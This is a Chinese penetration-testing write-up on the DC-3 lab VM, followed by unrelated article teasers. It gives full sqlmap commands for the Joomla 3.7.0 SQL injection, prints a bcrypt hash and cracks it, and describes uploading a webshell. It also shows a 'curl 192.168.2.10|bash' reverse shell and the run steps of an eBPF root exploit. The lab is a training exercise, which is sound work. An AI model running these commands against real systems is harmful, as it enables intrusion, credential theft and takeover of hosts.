网络安全之渗透测试实战-DC-3-靶机入侵

server/2024/9/23 7:24:42/

一、下载靶机DC-3,解压后导入Vmware Workstation

https://pan.baidu.com/s/17BcSH6RqC7wuyB7PRNqOow?pwd=kc12

启动DC-3靶机,由于不知道密码,无需登录
在这里插入图片描述
二、靶机的网卡采用的是NAT模式自动获取IP地址,此时我们需要先获取其MAC地址。
在这里插入图片描述
三、因为DC-3与kali攻击机在同一个网段,在kali攻击机中利用nmap 获取本网段的主机信息,根据MAC地址比对来获取DC-3的IP地址。我的kali系统所在网段为192.168.2.0/24,利用如下命令获取本网段的主机信息

 nmap -sP 192.168.2.0/24 

在这里插入图片描述
根据扫描结果进行比对,可知DC-3靶机的IP地址为192.168.2.5

进一步利用nmap工具对靶机进行端口扫描,以此获取靶机开放的端口及提供的服务

nmap -A 192.168.2.5 -p 1-65535 -oN nmap.DC3

在这里插入图片描述
由图可知,靶机的80端口处于开放状态,尝试使用浏览器进行访问
在这里插入图片描述
四、利用whatweb工具对web进行指纹识别
Web指纹定义:Web指纹是一种对目标网站的识别技术,通过识别网站所使用的服务器、运行的脚本、安装的CMS等信息对目标进行精准的分类和定位。Web指纹识别可以帮助我们在安全测试中快速了解目标网站的基本信息,有助于搜索其相关漏洞。
在这里插入图片描述

 whatweb http://192.168.2.5

在这里插入图片描述
由图可知,该站点是一个Joomla站点,因此我们可以使用JoomScan 命令行工具识别 Joomla网站中的潜在安全漏洞。通过扫描 Joomla 系统组件、插件、模块等,检查是否存在已知的易受攻击的版本。

joomscan --url http://192.168.2.5

在这里插入图片描述
从图中可知,扫描出了网站的目录结构以及后台地址
用浏览器打开其后台地址
在这里插入图片描述
我们还可以知道网站使用的是Joomla 3.7.0版本的模板,因此我们查找一下网站模板Joomla 3.7.0存在哪些漏洞,便可加以利用
在这里插入图片描述
由此可知该网站存在sql注入的漏洞
将漏洞相关信息拷贝到当前目录

cp /usr/share/exploitdb/exploits/php/webapps/42033.txt joomalv370_sqli.txt
cat joomalv370_sqli.txt

在这里插入图片描述
五、有了以上信息后,我们便可利用SQLMAP工具进行注入,获取我们想要的信息
(1)列出数据库库名

sqlmap -u "http://192.168.2.5/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]

在这里插入图片描述
(2)列出当前数据库库名

sqlmap -u "http://192.168.2.5/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --current-db -p list[fullordering]

在这里插入图片描述
由图可知当前的数据库名是joomladb
(3)列出joomladb数据库的表名

sqlmap -u "http://192.168.2.5/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D "joomladb" --tables -p list[fullordering]

在这里插入图片描述
(4)列出user表的字段及类型

sqlmap -u "http://192.168.2.5/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D "joomladb" -T "#__users" --columns -p list[fullordering]

在这里插入图片描述
(5)列出账号密码

sqlmap -u "http://192.168.2.5/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D "joomladb" -T "#__users" -C "name,password" --dump -p list[fullordering]

在这里插入图片描述
新建一个文档,并将获取到的密文密码放入其中,再利用解密工具解密
在这里插入图片描述
密码密文$2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu

vi joomlav370_admin_hash.txt

在这里插入图片描述
利用解密工具进行解密

john joomlav370_admin_hash.txt

在这里插入图片描述
获得密码明文为snoopy

此时,我们利用账号密码登录后台
在这里插入图片描述
在这里插入图片描述
仔细观察后发现该目录下有一个beez3的模板
在这里插入图片描述
进入之后,发现有目录,还可以编辑文件,因此可以考虑上传木马
在这里插入图片描述
要上传木马,我们先要找到当前文件所在的目录
在这里插入图片描述
新建一个yjh.php文件,并加入以下内容
在这里插入图片描述
然后对该页面进行访问,成功执行
在这里插入图片描述
使用中国蚁剑进行连接
在这里插入图片描述
在这里插入图片描述
六、反弹shell
首先了解下正向和反向链接
从一台hacker机器上直接链接被控机器,为正向链接;正向链接需要监听被控机器得端口开启情况,如果开启了端口,那么我就可以区连接被控得机器。
(1)在一台机器上被监听了端口,当被监测到端口开启后会发起向另外一台hacker机器远程链接得请求。
(2)但是目标主机处于内网环境是不可以被外网直接访问,只能主动将shell反弹出来.这种方式称作反弹shell,反弹shell(reverse shell),就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端,本质上是网络概念的客户端与服务端的角色反转。通常用于被控端因防火墙受限、权限不足、端口被占用等情形。
比如:
1.目标机器的ip动态改变,你不能持续控制。(只要对方的ip地址一换,权限就会丢失)
2.由于防火墙等限制,对方机器只能发送请求,不能接收请求。(攻击者发往目标机器的命令,被防火墙拦截无法执行,但目标机器在本地执行命令输出到攻击机器则不会受影响)
以上,这些情况下都没有办法使用常规的正向连接,让受害机器主动连接攻击机器,才是最佳的办法。
反弹shell是指控制端监听某个TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出传递到控制端的过程。
reverse shell与telnet、ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。反弹shell是打开内网通道的第一步,也是权限提升过程中至关重要的一步。
常见的反弹shell的方法

利用netcat反弹shell
利用Bash反弹shell 
Curl配合Bash反弹shell
将反弹shell的命令写入定时任务
将反弹shell的命令写入/etc/profile文件
利用Socat反弹shell
利用Telnet反弹shell
各种脚本反弹shell
Python 脚本反弹shell
php 脚本反弹shell
Perl 脚本反弹shell
Ruby脚本反弹shell
使用Metasploit生成反弹shell用的一句话

这里我采用curl配合bash反弹shell
(1)首先在kali攻击机器上安装apache2,并在其目录下新建index.html文件

apt-get install apache2
cd /var/www/html

在这里插入图片描述
kali 端开启监听本地2333端口

nc -lvvp 2333

在这里插入图片描述
(2)靶机端输入如下命令

curl 192.168.2.10|bash

成功反弹shell
在这里插入图片描述
七、提权
前面可知道,靶机当前的系统为ubuntu 16.04
在这里插入图片描述
在这里插入图片描述
下载提权脚本后上传至靶机
在这里插入图片描述
在这里插入图片描述

<emplates/beez3/39772/ebpf_mapfd_doubleput_exploit$ ./compile.sh

在这里插入图片描述

<emplates/beez3/39772/ebpf_mapfd_doubleput_exploit$ ./doubleput

在这里插入图片描述
在这里插入图片描述
提权成功,下期见


http://www.ppmy.cn/server/107405.html

相关文章

数分基础(03-1)客户特征分析

文章目录 客户特征分析1. 数据集2. 思路与步骤2.1 特征工程2.2 识别方法2.3 可视化 3. 分析准备3.1 读取数据集3.2 识别不同客户群体3.2.1 使用K-Means聚类进行初步细分3.2.2 关于聚类方法&#xff08;1&#xff09;特征缩放1&#xff09;平衡特征对模型的影响力&#xff0c;避…

计算机图形学OpenGL笔记

来自公众号&#xff1a;可计算离散整体几何结构 《可计算离散整体几何结构》(可视化)实验室出品 2.4.组合显示模式 2.4.1.组合模式基础 根据几种基本的显示模式&#xff0c;可以组合起来显示出更复杂的其他显示效 果。从而得到更多变的结果。组合的显示模式只需要调用相应的基…

抽奖系统PHP源码开源二开版带完整后台

该程序可以作为活动氛围活动气氛的烘托作用&#xff0c;活动游戏而已&#xff01; 抽奖系统源码是一个以php MySQL进行开发的手机抽奖系统源码。用途&#xff1a;适合做推广营销、直播、粉丝抽奖。 功能介绍&#xff1a; 1、后台可以设置每个抽奖用户的抽奖次数,后台添加设置…

XTuner微调个人小助手认知实战

1 微调前置基础 本节主要重点是带领大家实现个人小助手微调&#xff0c;如果想了解微调相关的基本概念&#xff0c;可以访问XTuner微调前置基础。 2 准备工作 环境安装&#xff1a;我们想要用简单易上手的微调工具包 XTuner 来对模型进行微调的话&#xff0c;第一步是安装 XTun…

【C++】14.类型转换

我们常见的类型转化有&#xff1a; 1. 内置类型转化内置类型 2. 内置类型转化自定义类型 3. 自定义类型转化内置类型 4. 自定义类型转化自定义类型 本篇博客就是针对上述转化进行讲解…… 一、内置类型转化内置类型 我们知道在C语言中支持浮点型向整型的隐式类型转化&#x…

AI绘画工具 Stable Diffusion【插画转绘】:建筑 | 风景| 人像照片的插画转绘制作教程,照片秒变插画风格图片!

大家好&#xff0c;我是画画的小强 关于Stable Diffusion 的插画转绘&#xff0c;今天给大家分享一种制作方法。我们先看一下效果图。 一. 图片转插画的制作方法 本期教程我们将使用AI绘画工具Stable Diffusion&#xff0c;关于SD的安装和入门使用可以看看我的往期入门教程…

React——useRef()

useRef 是 React 的一个 Hook&#xff0c;用于在组件的整个生命周期内持久化保存数据。主要有以下几个用途&#xff1a; 存储对 DOM 节点的引用&#xff1a;通过给 DOM 元素添加 ref 属性来直接访问实际的 DOM 节点。这常用于需要直接操作 DOM 时&#xff0c;比如管理焦点、文本…

【软件】常用软件教程一:码云(Gitee)使用方法

文章目录 一、简介二、创建远程仓库三、配置SSH公钥四、同步 Gitee 仓库内容到本地五、本地新建文件并同步至 Gitee六、删除远程仓库中的指定文件七、常见代码 一、简介 Git 是一种分布式版本控制系统&#xff0c;用于跟踪和管理代码的变更。它是由 Linus Torvalds 创建的&…